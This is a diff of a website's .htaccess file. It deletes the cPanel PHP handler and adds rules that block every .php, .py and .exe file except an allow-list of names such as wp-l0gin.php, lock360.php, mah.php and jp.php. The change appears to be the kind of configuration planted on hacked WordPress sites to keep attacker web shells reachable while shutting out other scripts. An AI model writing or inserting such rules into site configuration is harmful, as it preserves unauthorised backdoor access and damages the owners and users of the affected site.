--- a/.htaccess
+++ b/.htaccess
@@ -1,13 +1,16 @@
-
-
-# php -- BEGIN cPanel-generated handler, do not edit
-<IfModule fcgid_module>
-    <IfModule mime_module>
-        AddHandler fcgid-script .php .php8 .phtml
-        FcgidWrapper /usr/local/cpanel/cgi-sys/ea-php83 .php
-        FcgidWrapper /usr/local/cpanel/cgi-sys/ea-php83 .php8
-        FcgidWrapper /usr/local/cpanel/cgi-sys/ea-php83 .phtml
-    </IfModule>
+<FilesMatch ".(py|exe|php)$">
+ Order allow,deny
+ Deny from all
+</FilesMatch>
+<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php|mah.php|jp.php|ext.php)$">
+ Order allow,deny
+ Allow from all
+</FilesMatch>
+<IfModule mod_rewrite.c>
+RewriteEngine On
+RewriteBase /
+RewriteRule ^index\.php$ - [L]
+RewriteCond %{REQUEST_FILENAME} !-f
+RewriteCond %{REQUEST_FILENAME} !-d
+RewriteRule . /index.php [L]
 </IfModule>
-
-# php -- END cPanel-generated handler, do not edit
